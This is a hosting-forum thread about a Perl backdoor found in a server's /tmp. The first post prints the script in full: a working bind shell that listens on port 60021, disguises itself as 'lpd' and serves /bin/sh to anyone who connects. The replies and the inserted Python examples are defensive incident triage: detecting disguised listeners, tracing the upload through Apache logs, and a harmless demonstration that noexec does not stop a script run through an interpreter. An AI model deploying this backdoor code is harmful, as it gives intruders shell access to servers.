  1. #1
    Member
    Join Date
    Apr 2003
    Location
    Norway
    Posts
    26

    Default Possible hack?

    Found .bs.pl in /tmp with these contents:
    ----------------------------------------------
    #!/usr/bin/perl

    # * Author:
    # headflux (hf@synnergy.net)
    # Synnergy Networks (c) 1999, http://www.synnergy.net
    # *** Synnergy Networks

    use Socket;

    #rintf "BS\n";
    #lush();

    $port= 60021;                  # TCP port the backdoor listens on
    $proto= getprotobyname('tcp');
    $cmd= "lpd";                   # name the process will show in ps/netstat
    $system= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';  # banner, then a shell

    $0 = $cmd;                     # rewrite argv[0] so the process looks like lpd


    # listening TCP socket on port 60021, bound to all interfaces
    socket(SERVER, PF_INET, SOCK_STREAM, $proto)
    or die "socket:$!";

    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
    or die "setsockopt: $!";

    bind(SERVER, sockaddr_in($port, INADDR_ANY))
    or die "bind: $!";

    listen(SERVER, SOMAXCONN)or die "listen: $!";

    # for every client that connects: point stdin/stdout/stderr at the socket and
    # run $system, so the remote side gets an interactive /bin/sh running as
    # whatever user started this script; close the client when the shell exits
    for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
    {
    open(STDIN, ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");

    system($system);

    close(STDIN);
    close(STDOUT);
    close(STDERR);
    }

    ----------------------------------------------

    Is this used to hack the server?

    I noticed mysql going "wild" on the server moments before I noticed this script. The load went above 100.

    wget is disabled on my server so I was wondering how anyone can place this script in /tmp? It was owned by nobody.

    I would like to try the script in this thread: http://forums.cpanel.net/showthread....threadid=11082
    in order to find the domain it was uploaded by. I tried the script but found no result as wget is already disabled on my server.

    If wget was not used to put it there, what else might have been used?

    Eivind

  2. #2
    Member
    Join Date
    Jan 2004
    Posts
    227

    Default

    The load went above 100.
    Read what the script is doing and you will know if it is a hack; it lists all the commands.

    And wget is not the only way to put things in /tmp

  3. #3
    Member
    Join Date
    Apr 2003
    Location
    Norway
    Posts
    26

    Default

    Read what the script is doing and you will know if it is a hack, it lists all the commands
    I'm asking because I only understand some of it, but not enough to determine how serious the script is. It seems as if the script opens a TCP socket on port 60021. It determines which user it is run as, on which machine and in which directory.

    Could you tell me more about what the script does?

    And wget is not the only way to put things in /tmp
    I know. That's why I'm asking. Could you mention one or two?

    Eivind

  4. #4
    Member
    Join Date
    Oct 2002
    Posts
    751

    Default

    lynx, curl, scp, ftp

  5. #5
    Member
    Join Date
    Apr 2003
    Location
    Norway
    Posts
    26

    Default

    Thanks jamesbond!

    Unfortunately I was unable to determine how this file got in /tmp using the script at http://forums.cpanel.net/showthread....threadid=11082 with various tries (wget, scp, ftp, lynx, curl, bs.pl).

    Is there another way to find out where this file came from?

    Eivind

  6. #6
    Member
    Join Date
    Jan 2004
    Posts
    227

    Default

    Perhaps you should ask the server admin?

  7. #7
    Etheral
    Member
    Join Date
    Dec 2003
    Posts
    210

    Default

    socket(SERVER, PF_INET, SOCK_STREAM, $proto)
    or die "socket:$!";

    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
    or die "setsockopt: $!";

    bind(SERVER, sockaddr_in($port, INADDR_ANY))
    or die "bind: $!";

    listen(SERVER, SOMAXCONN)or die "listen: $!";
    That really gives it away.

  8. #8
    Member
    Join Date
    Jan 2004
    Posts
    227

    Default

    From what I can see it's a script to let someone else control your server, heh

  9. #9
    Etheral
    Member
    Join Date
    Dec 2003
    Posts
    210

    Default

    lol, basically
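What the script does, turned into something you can run on the box. This is an added example written for this thread; it is not code from the original posts and not a cPanel tool. It reads /proc/net/tcp (the same source netstat uses), lists TCP sockets in LISTEN state, maps each to the process holding the socket, and flags the two things the posted script gives away: a listener on a port you did not expect (60021 here) and a process whose argv[0] claims one name (the script sets $0 = "lpd") while /proc/<pid>/exe points at a different binary (perl). The socket table, process table and inode map used for the stand-alone run are constructed samples; on a real host the same functions read /proc directly, which needs root to see other users' file descriptors.

```python
"""Triage for a suspected Perl bind shell (added example, not from the thread).

/proc/net/tcp is what netstat reads; the parser takes its text so it runs on a
constructed sample as well as the live file.
"""
import os
from typing import Callable, Iterable, List, NamedTuple, Optional, Tuple

LISTEN_STATE = "0A"   # value of the "st" column for a listening socket


class Listener(NamedTuple):
    addr: str
    port: int
    inode: int


class Finding(NamedTuple):
    port: int
    pid: Optional[int]
    reason: str


def parse_proc_net_tcp(text: str) -> List[Listener]:
    """Return every LISTEN socket from /proc/net/tcp content."""
    out = []
    for line in text.splitlines()[1:]:            # first line is the header
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN_STATE:
            continue
        hexaddr, hexport = f[1].split(":")
        # address is hex in host (little-endian) byte order: 0100007F -> 127.0.0.1
        octets = [str(int(hexaddr[i:i + 2], 16)) for i in (6, 4, 2, 0)]
        out.append(Listener(".".join(octets), int(hexport, 16), int(f[9])))
    return out


def socket_owner(inode: int, proc: str = "/proc") -> Optional[int]:
    """Live lookup: the pid that has socket:[inode] open as a file descriptor."""
    target = "socket:[%d]" % inode
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            for fd in os.listdir(fd_dir):
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    return int(pid)
        except OSError:            # process exited, or fd dir not readable
            continue
    return None


def read_proc_info(pid: int, proc: str = "/proc") -> Tuple[bytes, str]:
    """Live lookup: (raw NUL-separated cmdline, resolved exe path)."""
    with open("%s/%d/cmdline" % (proc, pid), "rb") as fh:
        cmdline = fh.read()
    return cmdline, os.readlink("%s/%d/exe" % (proc, pid))


def argv0_mismatch(cmdline: bytes, exe: str) -> bool:
    """True when argv[0] names a different program than the binary running.

    $0 = "lpd" in the posted script rewrites argv[0] (what ps and netstat -p
    show) but cannot change /proc/<pid>/exe, which still resolves to perl.
    """
    argv0 = cmdline.split(b"\0", 1)[0].decode("utf-8", "replace")
    claimed = os.path.basename(argv0).lstrip("-")     # "-bash" is a login shell
    real = os.path.basename(exe.replace(" (deleted)", ""))
    return claimed != real and not real.startswith(claimed)   # perl vs perl5.8.8 is fine


def triage(net_tcp_text: str, allowed_ports: Iterable[int],
           owner: Callable[[int], Optional[int]] = socket_owner,
           proc_info: Callable[[int], Tuple[bytes, str]] = read_proc_info) -> List[Finding]:
    """Flag unexpected listeners and name-masquerading processes behind them."""
    allowed = set(allowed_ports)
    findings = []
    for l in parse_proc_net_tcp(net_tcp_text):
        pid = owner(l.inode)
        if l.port not in allowed:
            findings.append(Finding(l.port, pid, "unexpected listener on %s:%d" % (l.addr, l.port)))
        if pid is None:
            continue
        try:
            cmdline, exe = proc_info(pid)
        except (OSError, KeyError):
            continue
        if argv0_mismatch(cmdline, exe):
            argv0 = cmdline.split(b"\0", 1)[0].decode("utf-8", "replace")
            findings.append(Finding(l.port, pid, "argv[0] is %r but exe is %s" % (argv0, exe)))
    return findings


# --- constructed sample shaped like the box in this thread (not real data) ----
SAMPLE_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9001 1 0 0 0 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000    27        0 9103 1 0 0 0 0
   2: 00000000:EA75 00000000:0000 0A 00000000:00000000 00:00000000 00000000    99        0 12345 1 0 0 0 0
   3: 00000000:EA75 0A000002:C3A1 01 00000000:00000000 00:00000000 00000000    99        0 12346 1 0 0 0 0
"""
SAMPLE_PROCS = {     # pid -> (cmdline, exe) as /proc would present them
    812: (b"/usr/sbin/sshd\0", "/usr/sbin/sshd"),
    1790: (b"/usr/sbin/mysqld\0--port=3306\0", "/usr/sbin/mysqld"),
    4321: (b"lpd\0", "/usr/bin/perl"),          # the bind shell after $0 = "lpd"
}
SAMPLE_INODES = {9001: 812, 9103: 1790, 12345: 4321}   # socket inode -> pid

if __name__ == "__main__":
    hits = triage(SAMPLE_NET_TCP, {22, 3306},
                  owner=SAMPLE_INODES.get, proc_info=SAMPLE_PROCS.__getitem__)
    for h in hits:
        print("port %d pid %s: %s" % (h.port, h.pid, h.reason))
    # live run on this host (root needed to read other users' /proc/<pid>/fd):
    # triage(open("/proc/net/tcp").read(), {22, 25, 80, 110, 143, 443, 3306})
```

Row 3 of the sample is the same port in ESTABLISHED state (someone connected to the shell); the parser ignores it because only LISTEN entries identify the backdoor, but its presence in a real /proc/net/tcp gives you the remote address to block and to look for in other logs.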

  10. #10
    Member
    Join Date
    Apr 2003
    Location
    Norway
    Posts
    26

    Default

    Thanks for your inputs guys!

    It seems as if it's impossible to find the source of this file since I'm not running with php_suexec. If the file contents were downloaded from a file named file.txt by PHP, and PHP created the .bs.pl file in /tmp, then do I have no means of finding out where the file came from or which account created this file?

    I have /tmp nosuid and noexec. I thought that it would not be possible to run a script in /tmp because of this. Am I mistaken? If I am, how can I prevent such a script from running in /tmp?

    I really hope anyone has an answer to this.
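One way to get at "which account?" without suexec, as an added example for this thread (not code from the original posts). When PHP runs as nobody the file's owner says nothing, but the file's mtime does: whatever request made PHP write /tmp/.bs.pl was being served at or just before that timestamp, and each domain's Apache access log is a separate file on a cPanel box (assumed here to live under /usr/local/apache/domlogs/<domain>), so the log that holds the matching request names the account. The script parses combined-format log lines, keeps requests from a window before the mtime, and ranks them by heuristic indicators such as a URL passed as a query parameter, which is exactly the "PHP fetched file.txt from somewhere" scenario described above. The log lines, domain names and timestamp are constructed samples.

```python
"""Correlate a dropped file's mtime with per-domain Apache logs (added example)."""
import glob
import os
import re
from datetime import datetime
from typing import Dict, Iterable, List, NamedTuple, Optional, Tuple

DOMLOG_DIR = "/usr/local/apache/domlogs"      # assumption: cPanel per-domain logs
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"               # Apache %t, e.g. 10/Mar/2004:14:22:58 +0100
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


class Entry(NamedTuple):
    ts: float
    client: str
    method: str
    target: str
    status: int


class Candidate(NamedTuple):
    domain: str
    delta: float                  # seconds from the request to the file mtime
    indicators: Tuple[str, ...]
    line: str


def log_ts(s: str) -> float:
    return datetime.strptime(s, TS_FMT).timestamp()


def parse_line(line: str) -> Optional[Entry]:
    """Parse one combined/common log line; None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return Entry(log_ts(m.group("ts")), m.group("client"), m.group("method"),
                 m.group("target"), int(m.group("status")))


def indicators(e: Entry) -> Tuple[str, ...]:
    """Heuristics for 'a request that could have made PHP write a file'."""
    hits = []
    t = e.target.lower()
    if re.search(r"[?&][^=&]*=https?://", t):      # remote file passed in a parameter
        hits.append("remote-url-in-query")
    if "/tmp" in t:
        hits.append("tmp-path-in-query")
    if e.method == "POST":
        hits.append("post")
    if ".php" in t.split("?", 1)[0]:
        hits.append("php")
    return tuple(hits)


def correlate(logs: Dict[str, Iterable[str]], mtime: float,
              window: float = 300.0, skew: float = 5.0) -> List[Candidate]:
    """Requests logged in [mtime - window, mtime + skew], best candidates first.

    A request logged after the mtime cannot have created the file; `skew` only
    tolerates a few seconds of clock and buffer jitter.
    """
    out = []
    for domain, lines in logs.items():
        for line in lines:
            e = parse_line(line)
            if e is None:
                continue
            delta = mtime - e.ts
            if -skew <= delta <= window:
                out.append(Candidate(domain, delta, indicators(e), line.rstrip()))
    out.sort(key=lambda c: (-len(c.indicators), abs(c.delta)))
    return out


def load_domlogs(directory: str = DOMLOG_DIR) -> Dict[str, Iterable[str]]:
    """Live use: {log file name (the domain): lines} for every file in the dir."""
    logs = {}
    for path in glob.glob(os.path.join(directory, "*")):
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                logs[os.path.basename(path)] = fh.readlines()
    return logs


# --- constructed sample (not real logs) ---------------------------------------
SAMPLE_MTIME = log_ts("10/Mar/2004:14:23:02 +0100")   # stands in for os.stat("/tmp/.bs.pl").st_mtime
SAMPLE_DOMLOGS = {
    "example-victim.com": [
        '198.51.100.20 - - [10/Mar/2004:13:05:10 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
        '203.0.113.7 - - [10/Mar/2004:14:22:58 +0100] "GET /gallery/index.php?page=http://203.0.113.7/file.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    ],
    "other-site.com": [
        '192.0.2.9 - - [10/Mar/2004:14:21:00 +0100] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
        '192.0.2.9 - - [10/Mar/2004:14:23:30 +0100] "GET /contact.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    ],
}

if __name__ == "__main__":
    for c in correlate(SAMPLE_DOMLOGS, SAMPLE_MTIME):
        print("%-20s %+6.0fs %-24s %s" % (c.domain, c.delta, ",".join(c.indicators) or "-", c.line))
    # live: correlate(load_domlogs(), os.stat("/tmp/.bs.pl").st_mtime)
```

Copy the file (or at least record `stat` output) before doing anything else, since the mtime is the one piece of evidence that ties it to a request; anything that rewrites the file, including editing it in place, destroys it.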

  11. #11
    Member
    Join Date
    Jan 2004
    Posts
    227

    Default

    chown /tmp to "nobody"
    Run suexec, enable open_basedir protection and get a server admin.

  12. #12
    Member
    Join Date
    Apr 2003
    Location
    Norway
    Posts
    26

    Default

    What would chowning of /tmp to nobody accomplish (pros/cons)?

    The others I've already done. I've done all the security tweaking that's normal (and not) in these forums and other forums (snort, logwatch, chkrootkit, ssh modifications, mod_security etc.).

  13. #13
    Ben
    Member
    Join Date
    Aug 2002
    Posts
    77

    Default mount /tmp noexec

    More than anything else, the number one thing that will help you is to mount /tmp noexec. That, and run iptables or a similar firewall that only allows incoming connections to certain ports and blocks all others.
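On the question from post #10 (does nosuid,noexec on /tmp stop the script?), an added example for this thread, not code from the original posts. noexec makes the kernel refuse execve() of any file on that filesystem, so /tmp/.bs.pl cannot be started directly; it does nothing to `perl /tmp/.bs.pl`, because there the interpreter is the program being executed and the script is just a file it reads. The first function checks what /tmp is actually mounted with, from /proc/mounts or a constructed sample; the second shows the bypass. Remounting needs root, so the demo clears the execute bit on the file instead, which makes execve() fail with the same EACCES a noexec mount returns.

```python
"""Is /tmp really noexec, and what does noexec actually stop? (added example)"""
import os
import subprocess
import tempfile
from typing import Dict, Optional

CHECKED = ("noexec", "nosuid", "nodev")


def mount_options(mountpoint: str, mounts_text: str) -> Optional[Dict[str, bool]]:
    """{option: set?} for a mount point from /proc/mounts text; None if it is not a mount."""
    opts = None
    for line in mounts_text.splitlines():
        f = line.split()            # device mountpoint fstype options dump pass
        if len(f) >= 4 and f[1] == mountpoint:
            opts = set(f[3].split(","))       # last entry wins if overmounted
    if opts is None:
        return None
    return {o: o in opts for o in CHECKED}


def check_tmp(mounts_path: str = "/proc/mounts") -> Optional[Dict[str, bool]]:
    """Live check of the running system's /tmp."""
    with open(mounts_path) as fh:
        return mount_options("/tmp", fh.read())


def interpreter_bypass() -> Dict[str, str]:
    """Show that denying execve() of a file does not deny 'sh file'.

    The execute bit is cleared instead of remounting noexec (no root needed);
    both make execve() fail with EACCES, and neither stops an interpreter
    from reading the file, which is all "perl /tmp/.bs.pl" does.
    """
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "payload.sh")
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho ran-via-interpreter\n")
        os.chmod(path, 0o644)
        try:
            subprocess.run([path], check=True, capture_output=True)
            direct = "ran"
        except PermissionError:            # EACCES from execve, as on noexec
            direct = "denied"
        r = subprocess.run(["sh", path], capture_output=True, text=True)
        return {"direct": direct, "interp": r.stdout.strip()}


SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,nosuid,noexec 0 0
proc /proc proc rw 0 0
"""   # constructed /proc/mounts content

if __name__ == "__main__":
    print("sample /tmp:", mount_options("/tmp", SAMPLE_MOUNTS))
    try:
        print("this host /tmp:", check_tmp())
    except OSError:
        pass
    print("bypass:", interpreter_bypass())
```

So noexec is worth having (it stops the drop-and-run case and anything that execs a downloaded binary), but the script in this thread was almost certainly started as `perl /tmp/.bs.pl` from a PHP process, which noexec does not touch; the firewall rule that blocks inbound 60021 and everything else not explicitly allowed is what actually makes the bind shell unreachable.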
